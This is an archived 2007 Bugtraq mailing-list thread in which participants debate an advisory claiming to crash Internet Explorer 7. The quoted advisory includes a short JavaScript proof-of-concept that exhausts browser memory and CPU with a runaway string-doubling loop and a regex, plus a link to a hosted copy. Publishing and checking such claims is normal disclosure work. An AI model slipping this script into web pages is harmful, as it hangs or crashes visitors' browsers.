Re: Internet Explorer Crash
Tested on several machines- max CPU went to 25, and IE came up asking if I
wanted to stop the script in all cases. This is true of a default Vista
install of IE 7 and XP Pro installs upgraded to IE 7. Scripting has to be
on as well... Even on a dog computer, the prompt will come up (eventually).
Non-issue here.
t
----- Original Message -----
From: "Tom Gregory" <sick.minded@gmail.com>
To: "Thor (Hammer of God)" <thor@hammerofgod.com>
Cc: <bugtraq@securityfocus.com>
Sent: Wednesday, April 18, 2007 9:12 AM
Subject: Re: Internet Explorer Crash
> Actually Yes, the PoC crashing my IE, make it hang and my CPU usage goes
> to 100%, and i'm using Internet Explorer 7.0.5730.11 like he said.
>
> Tom
>
>
>
> Thor (Hammer of God) wrote:
>> Actually, I just get a message that says "A script on this page is
>> causing Internet Explorer to run slowly." But my CPU usage for
>> iexplore.exe is only at 20, and my system didn't slow down in the
>> least. I went ahead and told IE to continue to run the script, and pops
>> up again in a bit asking me the same thing. Finally bored, I say "no"
>> and it immediately came up with "Goodbye" on the page.
>>
>> If this actually makes Safari and Konqueror crash, why the "stop using
>> Microsoft products" recommendation? At least IE is smart enough to tell
>> me that your little "stupidInternetExploder" script is being pesky.
>>
>> t
>>
>> ----- Original Message ----- From: "J. Oquendo" <sil@infiltrated.net>
>> To: <bugtraq@securityfocus.com>
>> Sent: Tuesday, April 17, 2007 10:09 AM
>> Subject: Internet Explorer Crash
>>
>>
>>>
>> Product: Internet Explorer Version 7.0.5730.11
>> Impact: Browser crash possibly more
>> Author: Jesus Oquendo
>> echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'
>>
>>
>> I. BACKGROUND
>> Why bother? Who doesn't know what Internet Explorer and Microsoft are.
>>
>> II. DESCRIPTION
>> IE 7 is vulnerable to a script which causes the browser to hang. The
>> memory and CPU usage go through the roof. Originally the script caused
>> (and still causes) Safari and Konqueror to crash.
>>
>> III SOLUTION
>> Stop using Microsoft products or deal with a new advisory every other
>> day.
>>
>> IV. Proof
>> http://www.infiltrated.net/stupidInternetExploder.html
>>
>> V. Code
>>
>> $ more /stupidInternetExploder.html
>>
>> <script>
>>
>> var reg = /(.)*/;
>>
>> var z = 'Z';
>> while (z.length <=
>> 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
>>
>> 99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
>>
>> 99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
>>
>> 99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
>>
>> 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999)
>> z+=z;
>> var boum = reg.exec(z);
>>
>> </script>
>>
>> Goodbye
>>
>>
>> J. Oquendo
>> http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
>> sil . infiltrated @ net http://www.infiltrated.net
>> The happiness of society is the end of government.
>> John Adams
>>
>>
>>>
>>>
>
>
>
討論串 (同標題文章)
完整討論串 (本文為第 7 之 12 篇):